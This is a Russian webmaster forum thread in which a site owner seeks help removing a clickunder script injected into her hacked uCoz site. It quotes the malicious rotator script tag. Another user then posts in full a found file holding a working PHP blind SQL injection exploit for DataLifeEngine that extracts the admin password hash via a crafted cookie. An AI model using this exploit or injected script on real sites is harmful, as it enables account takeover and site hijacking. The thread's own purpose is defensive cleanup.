Помогите найти код!
Страницы: 1
Помогите найти код!
Здравствуйте, уважаемые Форумчане! Уже неоднократно обращалась к вам за помощью и знаю, что здесь много отзывчивых людей. Суть проблемы такова: буквально  прошло пару дней, как обнаружила на сайте наличие кликандера, кто-то вероятно взломал сайт и установил его. При нажатии на категорию вылазит сайт velcome-club точка com. Больше ничего вроде не изменилось. После появления этого кода сильно просел трафик. Не могу найти этот код на сайте. Может кто-то подскажет, где можно посмотреть или каким образом его отыскать? Заранее благодарна! Сайт: http://allsofts2009.ucoz.ru/
Изменено: Оксана - 16 Марта 2012 13:19
Спросите на форуме юкоза webanet вам наверняка поможет!smile:)
Цитата
<script language="javascript" src="http://uno.wt-rotator.biz/?t=rot&noadult=1&pid=49901"></script>
[COLOR=#373737]Данный код случайно не может оказаться этой какой?[/COLOR]
Спасибо, Лилия! Обязательно спрошу smile:)
Цитата
Оксана пишет:
Цитата
<script language="javascript" src="http://uno.wt-rotator.biz/?t=rot&noadult=1&pid=49901 (http://\"http://uno.wt-rotator.biz/?t=rot&noadult=1&pid=49901\")"></script>
[COLOR=#373737]Данный код случайно не может оказаться этой какой?[/COLOR]
это и есть, код этот от
визард-трафик wt-rotator   
визард-банерс  wb-rotator
Перенес тему в наиболее подходящий раздел.
Спасибо огромное! Нашла, удалила. Только не пойму код этот устанавливается только на главной? Вроде все перерыла, нигде больше не увидела. И можно ли как-то защититься от этих взломов?
Цитата
Оксана пишет:
защититься от этих взломов?
Смените пароль, установите лицензионный антивирус, не скачивайте кейгены и т.п. приложения, по чаще делайте бэкапы дизайна и всего сайта
Изменено: Number724 - 17 Марта 2012 12:05
Уважаемая Оксана!Аккаунт злоумышленника забанен в нашей системе. Спасибо, за проявленную бдительность!
код мог вставить кто-то у кого есть админские права на вход в панель управления сайтом на укозе. код как правило вставляется в шаблон главной страницы
Доступа ни у кого не было 100%. Не знаю каким образом, но сайт взломали и установили код. Я замечала, что происходит что-то странное, приходилось по несколько раз заходить в админку, но как-то не сильно обращала внимание. А зря!
обязательно меняйте пароль чаще и так, чтобы в пароле были и буквы и цифры. пароли от админки и от аккаунта на том же сайте должны быть разными, ну и свой комп берегите, т.к. если у вас заведтся червь-кейлоггер, то пароль от админки будет самой просто и безобидной потерей в отличии от сугубо личной Вашей информации smile:)
ребята на на сайте файл с названием 111.php и вот с таким содержанием 


Код
<html> 
  
        <head> 
                <title>DataLifeEngine Online Mod Exploit Blind SQL Injection</title> 
                <style type="text/css"> 
                        body{ 
                                font-family: Tahoma; 
                                font-size: 12px; 
                                color: #e1e1e1; 
                                background-color: #222; 
                        } 
                </style> 
        </head> 
         
        <body> 
                <center> 
                <form method="post" action="<?php echo $_SERVER['SCRIPT_NAME']?>"> 
                      dle path:<input type="text" name="server" value="localhost/dle/" /> 
                        <br/><br/> 
                       admin id:  <input type="text" name="userid" value="1" /> 
                        <br/><br/> 
                        <input type="submit" /> 
                </form> 
                </center> 
        </body> 
  
</html> 
  
<?php 
if (!empty($_POST)) 
{ 
        $_      = create_function('$error', 'die("$error";'); 
        $userid         = isset($_POST['userid'&#93 ? (int) $_POST['userid'] : null; 
        $server  = isset($_POST['server'&#93 ? $_POST['server'] : null; 
        $alphabet   = array('a', 'b', 'c', 'd', 'e', 'f', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0'); 
        $responce       = null; 
        $password       = null; 
        $curpos  = 1; 
        $alppos     = 0; 
        $flag       = false; 
         
         
        $pathinfo = parse_url($server); 
        if (false === is_array($pathinfo) or empty($pathinfo['host'&#93) { 
                $_('invalid url'); 
        } else { 
                $fsocket = fsockopen($pathinfo['host'], 80) or  
                        $_('hostname is dead'); 
                $request = "GET {$pathinfo['path']} HTTP/1.1\r\n" 
                                 . "Host: {$pathinfo['host']}\r\n" 
                                 . "Cookie: dle_onl_session='underWHAT?!\r\n\r\n"; 
                fwrite($fsocket, $request) or  
                        $_ ('failed to write data to socket'); 
                while ($flag === false){ 
                                        $responce .= fread($fsocket, 128); 
                                        $flag = strpos($responce, '</html>') ? true: false; 
                } 
        $flag = false; 
                if (strpos($responce, 'MySQL Error') > 0){ 
                        while (strlen($password) < 32) 
                        { 
                                $fsocket = fsockopen($pathinfo['host'], 80) or  
                                        $_('hostname is dead');  
                                $responce = null; 
                                $cookie   = "' or 1=if(substring((select password from dle_users where user_id = $userid),$curpos,1)='{$alphabet[$alppos]}',1,(select 1 union select 3))/*"; 
                                $request  = "GET {$pathinfo['path']} HTTP/1.1\r\n" 
                                                  . "Host: {$pathinfo['host']}\r\n" 
                                                  . "Connection: close\r\n" 
                                                  . "Cookie: dle_onl_session=$cookie\r\n\r\n"; 
                                fwrite($fsocket, $request) or  
                                        $_ ('failed to write data to socket'); 
                                $responce = fread($fsocket, 8000); 
                                if (!strpos($responce, 'returns more than 1 row')){ 
                                        $password .= $alphabet[$alppos]; 
                                        $curpos += 1; 
                                        $alppos = 0; 
                                } else { 
                                        $alppos += 1; 
                                } 
                                $flag     = false; 
                                $responce = null; 
                                fclose($fsocket); 
                        } 
                } else { 
            die ('<center><h1>not vulnerable</h1></center>'); 
        } 
                echo "<center><h1>$password</h1></center>";                                
        } 
} 
  
    
?>




скажите что за
Цитата
kashin пишет:
скажите что за

Взлом. Удаляйте.
О сколько нам открытий чудных готовит продвиженья путь:
И Google, сын ошибок трудных, и Yandex, парадоксов друг :)
Дешёвый хостинг для новичков и про
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
02:17 Как продвигать сайт с неуникальным контентом 
15:08 Стоит ли добавлять сайт в Rambler топ 100? 
12:59 Absence в Армении 
19:29 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 
14:50 Индексация страниц 
12:36 У кого новостник, дайте пару советов плиз 
13:53 AviTool - мощный инструмент для автоматизации работы с Avito 
01:31 Скрипт обменника валют 
21:59 Продам копию сайта. 
21:44 BestX24 - быстрый и безопасный обменник криптовалют и электронных денежных средств 
17:24 A-Parser 1.1 - продвинутый парсер поисковых систем, Suggest, PR, DMOZ, Whois, etc 
14:01 Продам аккаунты Gmail USA IP | Gmail MIX IP | Outlook Old 
13:15 SOCKS5 приватные прокси на 30 дней для PayPal 
13:14 Google Voice аккаунты для бесплатных SMS и звонков 
22:09 Добро пожаловать в цифровой мир... 
21:28 Ну что, кто куда деваете свои сайты? 
19:42 Топ-5 способов использовать мобильные прокси для бизнеса: подробный обзор 
22:08 Накрутка поисковых подсказок 
05:04 Точные прогнозы на футбол 
14:01 Union Pharm - топовая фарма-партнерка для профессионалов! 
10:59 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди